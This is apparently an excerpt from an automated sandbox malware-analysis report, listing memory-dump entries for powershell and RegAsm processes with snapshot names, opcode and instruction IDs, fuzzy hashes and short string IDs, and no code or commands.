                                                              • Source File: 00000012.00000002.2685835997.00007FF848D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ff848d20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: pH
                                                              • API String ID: 0-1445135382
                                                              • Opcode ID: 4585e3765e7df1aed8b2d457df181fa2646c0f4e8e033eaaa80be5a0d6705560
                                                              • Instruction ID: f3850035eb24bbf6f1953f336efe8383028aa8ae29b787ccef37b6bfa94d0373
                                                              • Opcode Fuzzy Hash: 4585e3765e7df1aed8b2d457df181fa2646c0f4e8e033eaaa80be5a0d6705560
                                                              • Instruction Fuzzy Hash: 4D411422F0EE5A4FEBB9B62824553B5B3D1EF447A5F4800BAD44EC3186DF0CAC098795

                                                              Control-flow Graph

                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2685835997.00007FF848D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D20000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_7ff848d20000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0a6d946f3ebf45264657777162fe075b2cdf422cb20a5809adf17323ec7ff7b9
                                                              • Instruction ID: ce2ce7b7a0031ab9ccc289412c37b1911292574cdcfbedb76352beb15f647af3
                                                              • Opcode Fuzzy Hash: 0a6d946f3ebf45264657777162fe075b2cdf422cb20a5809adf17323ec7ff7b9
                                                              • Instruction Fuzzy Hash: 87110B31B0DB444FEF59AA2C64052B9B7E1FF8A225F0841BFD04AC3452DB19A80A8245
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: daq
                                                              • API String ID: 0-1532007458
                                                              • Opcode ID: 882cd84aa59c620e1d56d820be879a8d52bc5b6b8c0ce20f5a647dcd53f74240
                                                              • Instruction ID: 2adbf19c0a1cad9a970a4a01428ff156f8e579063c7d1fee93fe97881972b31a
                                                              • Opcode Fuzzy Hash: 882cd84aa59c620e1d56d820be879a8d52bc5b6b8c0ce20f5a647dcd53f74240
                                                              • Instruction Fuzzy Hash: 84512730B002059FCB29EB79C61466EB6E6FF89300F048469D526EB3A5DF399D42CB95
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: daq
                                                              • API String ID: 0-1532007458
                                                              • Opcode ID: 9d08704daaf02480d941a71adf8c2ffb0815ffd52be5177e1d5ec8a9a86ec760
                                                              • Instruction ID: e2739409b5f53afdf14c982ec61aaa9b59a891f076a67ef325efccc9f061282a
                                                              • Opcode Fuzzy Hash: 9d08704daaf02480d941a71adf8c2ffb0815ffd52be5177e1d5ec8a9a86ec760
                                                              • Instruction Fuzzy Hash: 6151C630B002059FCB29EB79C65466EBAE6FF89300F048469D516AB3A5DF399D41CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: daq
                                                              • API String ID: 0-1532007458
                                                              • Opcode ID: de20353cb4367674a9605bfab37ad86959b95f610083272bdaa6ae9950e49115
                                                              • Instruction ID: 84ebf492316065d4b3a63d4571d1705f01cf660c43c5132c71d9e93e586ca0a7
                                                              • Opcode Fuzzy Hash: de20353cb4367674a9605bfab37ad86959b95f610083272bdaa6ae9950e49115
                                                              • Instruction Fuzzy Hash: 5A41C330B002058FCB29EB79C55466DBAE6FF88300F148469D51AEB3A9DF399D42CB91
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: 287e987bd6f7427f6d1a745f3692efea722e7ed20d90c15d20d40986d3a5a85d
                                                              • Instruction ID: 9581f89f4c15aa393ee69122de84b41073735363bd309f3fd2c2c2833c55d303
                                                              • Opcode Fuzzy Hash: 287e987bd6f7427f6d1a745f3692efea722e7ed20d90c15d20d40986d3a5a85d
                                                              • Instruction Fuzzy Hash: B231107090024AAFCB15DF7AFB4194EBBB5FF49300B008569D418D7229E73D9D9ACB81
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: f8c880656ab5f7f2c718ce6d6a6aa90fbaa8ddc889dcb2b8211f0f3a44156bd0
                                                              • Instruction ID: 2bb1650ee92728a6fb684525b4d8c7b88e6c8908fe33172121de3ccc4adc194b
                                                              • Opcode Fuzzy Hash: f8c880656ab5f7f2c718ce6d6a6aa90fbaa8ddc889dcb2b8211f0f3a44156bd0
                                                              • Instruction Fuzzy Hash: C221C270A0020AAFCB19DF7AF74594DBBA5FF88300B108569D418D7229EB7D5D9ACF81
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c609071dda3dfa0ef7be9670ef0021ec9706e01bdd55f8b893741538c4660090
                                                              • Instruction ID: 66e612d4a9481fea461a1e863f2aaa360ae61369b522674c53f3ca1f578d1649
                                                              • Opcode Fuzzy Hash: c609071dda3dfa0ef7be9670ef0021ec9706e01bdd55f8b893741538c4660090
                                                              • Instruction Fuzzy Hash: 0931BE313002095FDB19AB7AE55892E37E7FFC8650B114169E906DB3A4EF39DC02CB92
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 123775779c6620d83f4be1b6bdc9f01d030d21a8a4feb0c82a5333bd17e8c212
                                                              • Instruction ID: ae3116c7f5b1654a1ba525c7ba1681ecdecb0276f4399f32d14ff99d0811a156
                                                              • Opcode Fuzzy Hash: 123775779c6620d83f4be1b6bdc9f01d030d21a8a4feb0c82a5333bd17e8c212
                                                              • Instruction Fuzzy Hash: 8A2142303001096FDB19EB7AE808A2E3BE3FB85600F014129DA16DB365DE38DC01CB92
                                                              Memory Dump Source
                                                              • Source File: 00000014.00000002.2410482039.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_20_2_1770000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dfeceba34358bd4df07e960c43a7cc73e0f701eb2cebf5da15c7e8b7a0b22ed7
                                                              • Instruction ID: 89d95b6675cc49564015de58d89ad6670011e18fd9d44dd782f147fd85373404
                                                              • Opcode Fuzzy Hash: dfeceba34358bd4df07e960c43a7cc73e0f701eb2cebf5da15c7e8b7a0b22ed7
                                                              • Instruction Fuzzy Hash: ADC04C7508D3829FC3634AE15C259D63EECBA4213435B00DA9048DB562C1AC8CC2C773
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: daq
                                                              • API String ID: 0-1532007458
                                                              • Opcode ID: 65230cd1adf4332eed7cbca2a9a9cbfac6d4423547d129cf8d420e80e8cda0a6
                                                              • Instruction ID: cdec584348caaab45af929dfaeccecf65953fd4ecb5191015b6fb186b0bfe64d
                                                              • Opcode Fuzzy Hash: 65230cd1adf4332eed7cbca2a9a9cbfac6d4423547d129cf8d420e80e8cda0a6
                                                              • Instruction Fuzzy Hash: 2951C530A002088FCB19EB79C55867D7BE6FF84308F108429D50AAB3B5DE39DD06DBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: daq
                                                              • API String ID: 0-1532007458
                                                              • Opcode ID: 6b9ecb1cd7a1173d8fc3065d3b88f8ad3b35f7692b8c949aeaca432ac8fccc45
                                                              • Instruction ID: 6ed8e770d4d702f8cfb960613fb6973500b5da276f6096bb79b9a56f1c3d85d1
                                                              • Opcode Fuzzy Hash: 6b9ecb1cd7a1173d8fc3065d3b88f8ad3b35f7692b8c949aeaca432ac8fccc45
                                                              • Instruction Fuzzy Hash: 3451B530A002098FCB59EB79D55867D76E6FF88308F108429D50AAB3B4DE39DD05DBA1
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: daq
                                                              • API String ID: 0-1532007458
                                                              • Opcode ID: 31efffa98df7c9ddc94482b4b7da461c6c8e9dd547b50e7312a7057dcd14f6ea
                                                              • Instruction ID: a9ca2d9cd47af2d62814f9c1695f7232874ece9d943d9cd9ef86b08482530ed6
                                                              • Opcode Fuzzy Hash: 31efffa98df7c9ddc94482b4b7da461c6c8e9dd547b50e7312a7057dcd14f6ea
                                                              • Instruction Fuzzy Hash: A9419130B002098FDB59EF79D55867D76E6FF88308B108829D50AEB7B4DE39DD029B51
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: ed9da625b995ff1f454588fb21e457d71d662c0f9db9e0cb216656c0576ac56d
                                                              • Instruction ID: dcf9129fddb8a286ef22c0f6a30a767fbf75413e730d4f040b653bc8bc9d4953
                                                              • Opcode Fuzzy Hash: ed9da625b995ff1f454588fb21e457d71d662c0f9db9e0cb216656c0576ac56d
                                                              • Instruction Fuzzy Hash: B23145349442459FCB06EFB9EA599597FF5EF9530CB00C5AAC0089B63EDB749A0ACB40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: 32dc3fa8c390135f6ca21c601c22a1ed003e9616623ec7412f21e1ac3c52633b
                                                              • Instruction ID: f031c047ce13ef3da6780cc764776ca9bb6db5225126bd9e3a344864f5a2d4ff
                                                              • Opcode Fuzzy Hash: 32dc3fa8c390135f6ca21c601c22a1ed003e9616623ec7412f21e1ac3c52633b
                                                              • Instruction Fuzzy Hash: 723152749002458FCB06EFB9FA599597BF5FF9430CB00856AC4089B63EEB749A0ACB40
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Te]q
                                                              • API String ID: 0-52440209
                                                              • Opcode ID: 815073b0f20688b741bdd16d93baea046faed3751b358d892aaf253d2835d1e4
                                                              • Instruction ID: 2441f5b1afb841f0eacb37a2574ad887fae067f7ceb45fd5578f4e381da4378e
                                                              • Opcode Fuzzy Hash: 815073b0f20688b741bdd16d93baea046faed3751b358d892aaf253d2835d1e4
                                                              • Instruction Fuzzy Hash: A421EF749402059FCB09EFA9FB499597BE5EF9430CB108565D0089B63DEB749A0ACB80
                                                              Memory Dump Source
                                                              • Source File: 00000019.00000002.2495559896.0000000000FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_25_2_ff0000_RegAsm.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c7bb6c7f10b65eb1cadae594e4bd82fd36dd97beb226837fad694da9e7479960
                                                              • Instruction ID: 7b6698c5e308f62802b53f5f24bfc1e3eb6a0a573e3de59753865b6477776c4f
                                                              • Opcode Fuzzy Hash: c7bb6c7f10b65eb1cadae594e4bd82fd36dd97beb226837fad694da9e7479960
                                                              • Instruction Fuzzy Hash: 3E31D0357002054FDB09AB7CE55497E3BE2FFC9718B1541A8E50ACB3A5EE24DD06CBA1